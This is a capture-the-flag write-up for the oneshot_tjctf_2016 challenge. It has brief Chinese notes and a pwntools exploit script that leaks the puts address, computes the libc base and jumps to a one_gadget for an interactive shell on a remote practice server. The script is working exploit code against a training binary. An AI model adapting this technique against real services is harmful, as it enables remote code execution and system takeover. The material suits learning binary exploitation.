
只开了栈不可执行
泄露地址,然后再跳回去,最后跳到onegadget的位置
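"""Write-up script for the oneshot_tjctf_2016 challenge (buuoj remote instance).

The original was a single collapsed line; it is reformatted here with the
magic numbers named and the protocol steps commented.  Per the write-up the
binary only has NX enabled (no PIE, no full RELRO), which is why the ELF-side
addresses below can be fixed constants.  Mitigation note for defenders: with
PIE and full RELRO the two hard-coded ELF addresses would be invalid and the
GOT read the leak relies on would not be available.
"""
from pwn import ELF, context, log, remote
from LibcSearcher import *  # kept from the original script; not used below

context.log_level = 'debug'

BINARY = './oneshot_tjctf_2016'
LIBC_PATH = 'libc-2.23.so'           # alternative in the original: /lib/x86_64-linux-gnu/libc.so.6
REMOTE_HOST, REMOTE_PORT = 'node4.buuoj.cn', 26454

# Values the original sent as decimal strings (hex given for readability).
READ_LOCATION = 6294232     # 0x600ad8: the word read here is treated as the address of puts
RETURN_LOCATION = 4195910   # 0x400646: answer to the first "Jump location?" prompt (re-enters the binary)
# libc-2.23 one_gadget offsets listed in the original; only the first one is used.
ONE_GADGET_OFFSETS = [0x45216, 0x4526a, 0xf02a4, 0xf1147]


def main() -> None:
    """Run the leak / re-entry / jump sequence against the remote service."""
    io = remote(REMOTE_HOST, REMOTE_PORT)
    # io = process(BINARY)  # local run (was commented out in the original as well)
    libc = ELF(LIBC_PATH)
    elf = ELF(BINARY)  # loaded but not referenced in the original; kept for its checksec output

    read_location = str(READ_LOCATION).encode()

    # Step 1: ask the binary to print the word at READ_LOCATION; the service
    # prints it as 0x-prefixed hex, the leading "0x0000" is skipped as in the original.
    io.recvuntil(b"Read location?")
    io.sendline(read_location)
    io.recvuntil(b"0x0000")
    puts_addr = int(io.recvuntil(b"\n").strip(), 16)
    log.success("puts_addr:" + hex(puts_addr))

    # Step 2: jump back into the binary so a second read/jump round is available.
    io.recvuntil(b"Jump location?")
    io.sendline(str(RETURN_LOCATION).encode())
    io.recvuntil(b"Read location?")
    io.sendline(read_location)

    libcbase = puts_addr - libc.sym["puts"]
    # Sanity check: a libc base that is not page-aligned means the leak was misparsed.
    if libcbase & 0xfff:
        log.warning("libc base %#x is not page aligned; leak may be wrong", libcbase)
    target = libcbase + ONE_GADGET_OFFSETS[0]

    # Step 3: final jump.
    io.recvuntil(b"Jump location?")
    io.sendline(str(target).encode())
    io.interactive()


if __name__ == "__main__":
    main()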
